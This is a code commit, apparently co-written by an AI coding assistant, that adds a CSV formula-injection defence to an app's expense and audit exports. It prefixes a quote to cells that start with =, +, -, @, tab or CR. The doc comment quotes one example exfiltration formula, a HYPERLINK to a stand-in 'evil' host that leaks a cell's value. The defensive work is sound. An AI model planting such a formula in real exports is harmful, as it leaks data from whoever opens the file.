fix(audit): H10 — neutralize CSV formula injection in expense + audit exports

Adds sanitizeCsvCell() (prefixes a quote when a cell starts with = + - @
tab/CR) and applies it to the audit-export escape() and the user-controlled
free-text columns of the expense export before Papa.unparse.

Co-Authored-By: Claude Opus 4.8 (1M context) <noreply@anthropic.com>

src/lib/csv/sanitize-csv-cell.ts

@@ -0,0 +1,27 @@
+/**
+ * CSV formula-injection defense.
+ *
+ * Spreadsheet applications (Excel, Google Sheets, LibreOffice Calc)
+ * interpret any cell whose first character is `=`, `+`, `-`, `@`, a tab
+ * (`\t`) or a carriage return (`\r`) as a formula. Attacker-seeded
+ * free-text fields can therefore smuggle payloads like
+ * `=HYPERLINK("http://evil/?leak="&A1)` that execute the moment an admin
+ * opens an export.
+ *
+ * The standard mitigation is to prefix such values with a single quote,
+ * which spreadsheets treat as "force text" and strip on display. This is
+ * a pure function: it only inspects the stringified value and returns a
+ * neutralized string, never mutating its input.
+ *
+ * Apply this BEFORE any RFC 4180 quote-escaping — the leading quote is
+ * part of the cell's value, not the CSV framing.
+ */
+const FORMULA_TRIGGERS = new Set(['=', '+', '-', '@', '\t', '\r']);
+
+export function sanitizeCsvCell(value: unknown): string {
+  const s = String(value);
+  if (s.length > 0 && FORMULA_TRIGGERS.has(s[0]!)) {
+    return `'${s}`;
+  }
+  return s;
+}

src/lib/services/expense-export.tsx

@@ -1,6 +1,7 @@
 import Papa from 'papaparse';
 import { eq, and, gte, lte, isNull, or, ilike } from 'drizzle-orm';
 
+import { sanitizeCsvCell } from '@/lib/csv/sanitize-csv-cell';
 import { db } from '@/lib/db';
 import { expenses } from '@/lib/db/schema/financial';
 import { ports } from '@/lib/db/schema/ports';
@@ -63,17 +64,21 @@ export async function exportCsv(portId: string, query: ListExpensesInput): Promi
   // quotes, newlines, BOM) that the hand-rolled escape-and-quote version
   // missed. Keyed objects let us define column order via `columns` and
   // get matching headers for free.
+  // Neutralize spreadsheet formula triggers on user-controlled free-text
+  // fields before papaparse serializes them (papaparse has no built-in
+  // CSV-injection guard). Numeric/derived columns are not attacker-seeded
+  // free text, so they keep their native values and formatting.
   return Papa.unparse(
     rows.map((r) => ({
       Date: r.expenseDate ? new Date(r.expenseDate).toISOString().split('T')[0] : '',
-      Establishment: r.establishmentName ?? '',
-      Category: r.category ?? '',
+      Establishment: sanitizeCsvCell(r.establishmentName ?? ''),
+      Category: sanitizeCsvCell(r.category ?? ''),
       Amount: r.amount,
       Currency: r.currency,
       'Amount USD': r.amountUsd ?? 'N/A',
-      'Payment Status': r.paymentStatus ?? '',
-      'Payment Method': r.paymentMethod ?? '',
-      Description: r.description ?? '',
+      'Payment Status': sanitizeCsvCell(r.paymentStatus ?? ''),
+      'Payment Method': sanitizeCsvCell(r.paymentMethod ?? ''),
+      Description: sanitizeCsvCell(r.description ?? ''),
     })),
     {
       columns: [